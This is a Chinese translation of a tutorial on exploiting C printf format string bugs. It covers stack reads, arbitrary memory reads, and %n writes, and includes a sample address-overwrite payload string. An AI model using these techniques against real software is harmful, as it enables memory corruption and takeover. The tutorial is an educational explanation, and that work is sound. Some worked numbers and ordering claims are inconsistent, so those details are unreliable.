tutorial exploitation format string

来源：互联网发布：史蒂芬周 mac 编辑：程序博客网时间：2024/06/08 19:50

原文地址：http://www.infond.fr/2010/07/tutorial-exploitation-format-string.html

本文是一个源于format string攻击的入门介绍。这个攻击由于C语言的*printf函数的错误实现引起。

什么是format string vulnerability？

当有可能在*printf()中注入恶意format string时，这种攻击就会出现。format string由%标识。
这是一个正确的printf()使用，format与一个字符串关联
printf("%s", "hello");
这是一个错误的使用。人们可以注入下面的format string：
printf(argv[1]);

关于*printf的细节可以参考：

http://man7.org/linux/man-pages/man3/sprintf.3.html

%x 输出十六进制格式. 用一个无符号整数作为参数(有出栈操作),
%s 输出一个字符串. 用一个指向字符串的指针作为参数(有出栈操作),
%n 不打印任何东西. 用一个地址作为参数t (有出栈操作). 把一个有符号整数写到这个地址上. 这个整数是到目前为止已经打印
的字符数目
- %x 运行我们读栈,
- %s 允许我们读内存的任何位置,
- %n 运行我们写内存的任何位置,
- $[number]%n ( $[number]%x )允许我们把任何东西写到任何地方, 没有出栈.将在后面会有详细介绍.

READ THE STACK:

在调用printf()之前，参数被压入堆栈。例如下面， 0x00000000和0xfffffff入栈，然后出栈打印
printf(%x%x,0xffffffff,0x00000000)
当我们“忘记”提供参数给printf()函数时，问题出现了。printf()函数无论如何都出栈并且打印它找到的内容。所以下面将会打印栈顶的两个数据(并且出栈)。
printf(%x%x)

READ IN MEMORY:

作为参数传给print的字符串在printf()函数调用前从后向前的顺序入栈。然后每个字符相继的copy到栈上。例如
main(){ printf("hello"); }
+---------+
| o.... | <-- internal stack of printf():
+---------+ successively "hell" then "o\x00.."
| .... |
+---------+
| hell | <- stack of main()
+---------+
| o.... |
+---------+

Tip: %[number]$s允许我们访问第number个字符串而不出栈。

我们可以用%x出栈直到到达我们的字符串(由main()函数入栈)

例如，下行直接访问栈中的第8个word。更奇妙的是：没有出栈操作
但是printf提供了一个很好的工具：我们可以用%[n]$s访问栈中的第n个字符串。例如下行访问栈中的第8个字符串

printf(%8$s)

这个技巧被设计用于几次打印同一个参数。例如，你可能想要8次打印同样的内容

"oh la! la! la! la! la! la! la! la!"

你可以这样写:

printf("oh %s %s %s %s %s %s %s %s; "la!","la!","la!","la!","la!","la!","la!","la!");

或者:

printf("oh %1$s %1$s %1$s %1$s %1$s %1$s %1$s %1$s; "la!");

这种表示法不常用。但是它对于format string exploitation很有用，因为它允许我们多次读取栈中的任何内容，不用出栈。

现在，让我们在我们的foramt string串前放一个地址，并且使用%[n]$s:

printf ( [address]%[n]$s )

Main() 把字符串放到栈上:首先 s, 然后 $, 其次 [n], 在其次 %, 并且在栈顶: [address].
Main() 然后在它上面放一些字符串。我们将会在其之上访问我们的地址。

printf()调用然后相继的读取sting中的参数，然后执行：
- [address] : prints [address],
- %[n]$s :打印放在栈里第n个位置存放的address所指向的的字符串。我们选择[n]来使其指向[address]

然后我们可以读[address]指向的字符串

WRITE AN INTEGER IN MEMORY:

现在我们看看如果我们用%n替换%s会发生什么。一个整数会写到address指定的位置。这个整数等于到目前为止printf()打印了多少个字符串。所以我们不得不打印足够长的char来获得我们希望的整数

Tip: %[n]$[k]x打印[k]个char

例如，如果[k] == 20并且"word"在栈的第7个位置

printf(%7$20x)

0000000000000000word

让我们用这个tip来写内存

WRITE AN ADDRESS IN MEMORY

我们的字符串将会是：

[address+3][address+2][address+1][address]%1$[n1-16]x%[m+1]$n%1$[n2-n1]x%[m+2]$n%1$[n3-n2]x%[m+3]$n%1$[n4-n3]x%[m+4]$n[padding]

例如：

"\x43\xff\xff\xbf\x42\xff\xff\xbf\x41\xff\xff\xbf\x40\xff\xff\xbf%1$85x%8$n%1$127x%9$n%1$156x%10$n%1$408x%11$nAAA"

注意：表示法%[number]，不出栈

[m]是写到address+3这个地址字符的数量
[n1], [n2], [n3] et [n4] are decimal values of ASCII codes we want to write in each byte of memory.
[n1], [n2], [n3], [n4]是我们想写到内存的每个byes的ASCII码的十进制值

printf函数如何解释参数，以及内存中发生了什么？
答案是：
[address+3][address+2][address+1][address] : 打印16个char，memory和stack不受影响
%1$[n1-16]x : 打印[n1-16]个char(空格和栈上的第一个参数组成)。到目前打印了n1个char，stack没有被修改

%[m+1]$n : 不打印任何东西，把到目前为止所打印的字符数(n1)写到在第[m+1]个位置的地址中([address+3])
%1$[n2-n1]x : 打印[n2-n1]个char。到目前为止，已经打印了n2个char。
%[m+2]$n : 不打印任何东西，把到目前为止所打印的字符数(n2)写到在第[m+2]个位置的地址中([address+2])
%1$[n3-n2]x : 打印[n3-n2]个char。到目前为止，已经打印了n3个char

%[m+3]$n : 不打印任何东西，把到目前为止所打印的字符数(n3)写到在第[m+3]个位置的地址中([address+1])

%1$[n4-n3]x :打印[n4-n3]个char。到目前为止，已经打印了n4个char.
%[m+4]$n : 不打印任何东西。把到目前为止所打印的字符数(n4)写到在第[m+4]个位置的地址中([address])

Tip:使用padding来使栈位置对齐

然后我们在string尾部添加padding
[padding]: 在string的尾部添加0，1，2，3个char(在栈的底部)，用来使在栈上的地址对齐。事实上

这是我们希望得到的栈

+----------------+
|                 |
| m words |
|                 |
+----------------+
|address+3|
+----------------+
|address+2|
+----------------+
|address+1|
+----------------+
| address    |
+----------------+
| %...       |
+----------------+

format string%n从栈上取一个参数作为地址。但通常，这个地址在栈上不是对齐的

例如我们有一个地址AAAA (\x41\x41\x41\x41).这个地址在栈上可能被分成两部分。有4种可能的情况：

-41000000-00414141-
-41410000-00004141-
-41414100-00000041-
-41414141-     <-- we want that!
如果我们增加正确的padding，我们可以对齐地址。我们把它放到string的尾部。

-使用%n获得的已经写了多少个char不受影响，因为我们把它放在每个%n的后面

-我们的四个地址的对齐会受影响，因为在栈上我们把padding放在地址的下面

Tip:每个参数的长度是4的倍数
养成一个好习惯：每个参数的长度是4的倍数(= 4 characters, = 1 word of the stack, = 32 bits)

例如：
%1$[n1-16]x -> 8 bytes -> % 1 $和x是4 bytes，所以[n1-16] =xxxx(占4 bytes)(4+4 = 8)

%[m+1]$n -> 8 bytes -> %,$ 和 n 是 3 bytes, 所以 [m+1] = xxxxx (占5 bytes) (3+5 = 8)
Tip:在十进制数之前加0来使参数的长度是4 bytes的倍数
We can add some 0 (zero) left to every integers in our string. For example [n1-16] = "0235" , [m+1] = "00099"
"00099" will be interpreted as "99", and we will have pushed 5 bytes on the stack.

在我们的string中，可以在每个整数之前加0. 例如[n1-16] = "0235" , [m+1] = "00099"， "00099"将会解释为99，这样我们就会入栈5 bytes

why [address+3][address+2][address+1][address] ?

假如:
- [source] 是我们payload的地址。例如：[source] = 0xaabbccdd,

- [address] 是我们要谢夫的地址，例如[address] = 0x8049654.
aa bb cc dd
                 ^address
         ^address1
    ^address2
^address3

[address+3]= 0x8049657 -> aabbccdd
[address+2]= 0x8049656 -> ??aabbcc
[address+1]= 0x8049655 -> ????aabb
[address]     = 0x8049654 -> ??????aa

选择 [n1], [n2], [n3], [n4]:

如果 [source] = 0xaabbccdd
aa, bb, cc 和 dd will be equal to numbers of characters written by printf until %n call.

将会等于在遇到%n之前printf写入的char的个数
所以我们需要 aa > bb > cc > dd

Tip: add hundreds to each source address byte

Tip:用大数据来写每一个 source address 的byte

例如:
[n1] = 0xdd = 221
[n2] = 0x1cc = 460
[n3] = 0x2bb = 699
[n4] = 0x3dd = 989
当前面的十六进制数相继写到内存，结果将是

       0x000000dd
   0x0001ccdd
   0x02bbccdd (the 1 of 1cc 被覆盖)
0x3 0xaabbccdd (the 2 of 2bb 被覆盖, and the 3 of 3aa 将会写到下一个word中)

CONCLUSION

You have seen that format strings allow bad guys to read the stack, read or write anywhere in memory.